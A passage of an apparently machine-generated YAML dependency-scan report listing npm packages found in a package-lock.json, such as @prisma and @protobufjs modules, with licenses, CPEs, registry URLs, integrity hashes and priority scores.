5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 '@prisma/fetch-engine': 5.22.0 '@prisma/get-platform': 5.22.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c3ee871894c65f6a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2' title: '@prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2' description: 'Package discovered: @prisma/engines-version 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3a15a4d5b57a6a32 name: '@prisma/engines-version' version: 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/engines-version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/engines_version:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines-version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/engines:\@prisma\/engines_version:5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40prisma/engines-version@5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@prisma/engines-version/-/engines-version-5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2.tgz integrity: sha512-2PTmxFR2yHW/eB3uqWtcgRcgAbG1rwG9ZriSvQw+nnb7c4uCr3RAcGMb6/zfE88SKlC1Nj2ziUvc96Z379mHgQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 17f0b8bb58a0d4a7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @prisma/fetch-engine 5.22.0' title: '@prisma/fetch-engine 5.22.0' description: 'Package discovered: @prisma/fetch-engine 5.22.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 373747b9463a5333 name: '@prisma/fetch-engine' version: 5.22.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/fetch-engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/fetch_engine:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch-engine:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/fetch:\@prisma\/fetch_engine:5.22.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40prisma/fetch-engine@5.22.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@prisma/fetch-engine/-/fetch-engine-5.22.0.tgz integrity: sha512-bkrD/Mc2fSvkQBV5EpoFcZ87AvOgDxbG99488a5cexp5Ccny+UM6MAe/UFkUC0wLYD9+9befNOqGiIJhhq+HbA== dependencies: '@prisma/debug': 5.22.0 '@prisma/engines-version': 5.22.0-44.605197351a3c8bdd595af2d2a9bc3025bca48ea2 '@prisma/get-platform': 5.22.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d7f7c5d00389674a ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @prisma/get-platform 5.22.0' title: '@prisma/get-platform 5.22.0' description: 'Package discovered: @prisma/get-platform 5.22.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 35191eb100a1fadc name: '@prisma/get-platform' version: 5.22.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/get-platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/get_platform:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get-platform:5.22.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@prisma\/get:\@prisma\/get_platform:5.22.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40prisma/get-platform@5.22.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@prisma/get-platform/-/get-platform-5.22.0.tgz integrity: sha512-pHhpQdr1UPFpt+zFfnPazhulaZYCUqeIcPpJViYoq9R+D/yw4fjE+CtnsnKzPYm0ddUbeXUzjGVGIRVgPDCk4Q== dependencies: '@prisma/debug': 5.22.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e931437e79a085b9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/aspromise 1.1.2' title: '@protobufjs/aspromise 1.1.2' description: 'Package discovered: @protobufjs/aspromise 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 503ecf3ae2d5a446 name: '@protobufjs/aspromise' version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/aspromise:\@protobufjs\/aspromise:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/aspromise@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/aspromise/-/aspromise-1.1.2.tgz integrity: sha512-j+gKExEuLmKwvz3OgROXtrJ2UG2x8Ch2YZUxahh+s1F2HZ+wAceUNLkvy6zKCPVRkU++ZWQrdxsUeQXmcg4uoQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: e4bf388f995dc845 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/base64 1.1.2' title: '@protobufjs/base64 1.1.2' description: 'Package discovered: @protobufjs/base64 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 493d13966d12b3a0 name: '@protobufjs/base64' version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/base64:\@protobufjs\/base64:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/base64@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/base64/-/base64-1.1.2.tgz integrity: sha512-AZkcAA5vnN/v4PDqKyMR5lx7hZttPDgClv83E//FMNhR2TMcLUhfRUBHCmSl0oi9zMgDDqRUJkSxO3wm85+XLg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: fad1d6a5684086d4 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/codegen 2.0.5' title: '@protobufjs/codegen 2.0.5' description: 'Package discovered: @protobufjs/codegen 2.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 12a6d95fe5a62fc1 name: '@protobufjs/codegen' version: 2.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/codegen:\@protobufjs\/codegen:2.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/codegen@2.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/codegen/-/codegen-2.0.5.tgz integrity: sha512-zgXFLzW3Ap33e6d0Wlj4MGIm6Ce8O89n/apUaGNB/jx+hw+ruWEp7EwGUshdLKVRCxZW12fp9r40E1mQrf/34g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: efbb149e9a326e2c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/eventemitter 1.1.0' title: '@protobufjs/eventemitter 1.1.0' description: 'Package discovered: @protobufjs/eventemitter 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 7097fcb2aeb00411 name: '@protobufjs/eventemitter' version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/eventemitter:\@protobufjs\/eventemitter:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/eventemitter@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/eventemitter/-/eventemitter-1.1.0.tgz integrity: sha512-j9ednRT81vYJ9OfVuXG6ERSTdEL1xVsNgqpkxMsbIabzSo3goCjDIveeGv5d03om39ML71RdmrGNjG5SReBP/Q== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 817b2c8a979dff10 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/fetch 1.1.0' title: '@protobufjs/fetch 1.1.0' description: 'Package discovered: @protobufjs/fetch 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4ed2c80c8ad8c116 name: '@protobufjs/fetch' version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/fetch:\@protobufjs\/fetch:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/fetch@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/fetch/-/fetch-1.1.0.tgz integrity: sha512-lljVXpqXebpsijW71PZaCYeIcE5on1w5DlQy5WH6GLbFryLUrBD4932W/E2BSpfRJWseIL4v/KPgBFxDOIdKpQ== dependencies: '@protobufjs/aspromise': ^1.1.1 '@protobufjs/inquire': ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 253d6aca6c381638 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/float 1.0.2' title: '@protobufjs/float 1.0.2' description: 'Package discovered: @protobufjs/float 1.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dda6f1aef9d11e58 name: '@protobufjs/float' version: 1.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/float:\@protobufjs\/float:1.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/float@1.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/float/-/float-1.0.2.tgz integrity: sha512-Ddb+kVXlXst9d+R9PfTIxh1EdNkgoRe5tOX6t01f1lYWOvJnSPDBlG241QLzcyPdoNTsblLUdujGSE4RzrTZGQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7699234b047c9f55 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/inquire 1.1.1' title: '@protobufjs/inquire 1.1.1' description: 'Package discovered: @protobufjs/inquire 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a8f805afd5f928e8 name: '@protobufjs/inquire' version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/inquire:\@protobufjs\/inquire:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/inquire@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/inquire/-/inquire-1.1.1.tgz integrity: sha512-mnzgDV26ueAvk7rsbt9L7bE0SuAoqyuys/sMMrmVcN5x9VsxpcG3rqAUSgDyLp0UZlmNfIbQ4fHfCtreVBk8Ew== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 0888dd200a4f8fb9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/path 1.1.2' title: '@protobufjs/path 1.1.2' description: 'Package discovered: @protobufjs/path 1.1.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 742d5880151b22a5 name: '@protobufjs/path' version: 1.1.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/path:\@protobufjs\/path:1.1.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/path@1.1.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/path/-/path-1.1.2.tgz integrity: sha512-6JOcJ5Tm08dOHAbdR3GrvP+yUUfkjG5ePsHYczMFLq3ZmMkAD98cDgcT2iA1lJ9NVwFd4tH/iSSoe44YWkltEA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 37fb5baaf891bf3b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/pool 1.1.0' title: '@protobufjs/pool 1.1.0' description: 'Package discovered: @protobufjs/pool 1.1.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2f9166cf527d1f74 name: '@protobufjs/pool' version: 1.1.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/pool:\@protobufjs\/pool:1.1.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/pool@1.1.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/pool/-/pool-1.1.0.tgz integrity: sha512-0kELaGSIDBKvcgS4zkjz1PeddatrjYcmMWOlAuAPwAeccUrPHdUqo/J6LiymHHEiJT5NrF1UVwxY14f+fy4WQw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 008b4e7e3539d471 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @protobufjs/utf8 1.1.1' title: '@protobufjs/utf8 1.1.1' description: 'Package discovered: @protobufjs/utf8 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: afb917b3027623df name: '@protobufjs/utf8' version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: BSD-3-Clause spdxExpression: BSD-3-Clause type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@protobufjs\/utf8:\@protobufjs\/utf8:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40protobufjs/utf8@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@protobufjs/utf8/-/utf8-1.1.1.tgz integrity: sha512-oOAWABowe8EAbMyWKM0tYDKi8Yaox52D+HWZhAIJqQXbqe0xI/GV7FhLWqlEKreMkfDjshR5FKgi3mnle0h6Eg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: b1e07271de6eec7b ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-email/render 0.0.16' title: '@react-email/render 0.0.16' description: 'Package discovered: @react-email/render 0.0.16' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: e1894e7a0de3acac name: '@react-email/render' version: 0.0.16 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_email\/render:\@react-email\/render:0.0.16:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_email\/render:\@react_email\/render:0.0.16:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-email\/render:0.0.16:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_email\/render:0.0.16:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-email/render@0.0.16 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-email/render/-/render-0.0.16.tgz integrity: sha512-wDaMy27xAq1cJHtSFptp0DTKPuV2GYhloqia95ub/DH9Dea1aWYsbdM918MOc/b/HvVS3w1z8DWzfAk13bGStQ== dependencies: html-to-text: 9.0.5 js-beautify: ^1.14.11 react-promise-suspense: 0.3.4 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2e3b9f0f7d4d1d7f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/fns 2.2.1' title: '@react-pdf/fns 2.2.1' description: 'Package discovered: @react-pdf/fns 2.2.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 38462ff4454997a0 name: '@react-pdf/fns' version: 2.2.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:2.2.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:2.2.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/fns@2.2.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-2.2.1.tgz integrity: sha512-s78aDg0vDYaijU5lLOCsUD+qinQbfOvcNeaoX9AiE7+kZzzCo6B/nX+l48cmt9OosJmvZvE9DWR9cLhrhOi2pA== dependencies: '@babel/runtime': ^7.20.13 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 06f3ac6357300fe3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @react-pdf/fns 3.1.3' title: '@react-pdf/fns 3.1.3' description: 'Package discovered: @react-pdf/fns 3.1.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4656650b2a6dd236 name: '@react-pdf/fns' version: 3.1.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react-pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react_pdf\/fns:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react-pdf\/fns:3.1.3:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@react:\@react_pdf\/fns:3.1.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40react-pdf/fns@3.1.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@react-pdf/fns/-/fns-3.1.3.tgz integrity: sha512-0I7pApDr1/RLAKbizuLy/IHTEa93LSPy/bEwYniboC3Xqnp6Od8xFJKbKEzGw2wh/5zKFFwl00g4t9RwgIMc3w== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 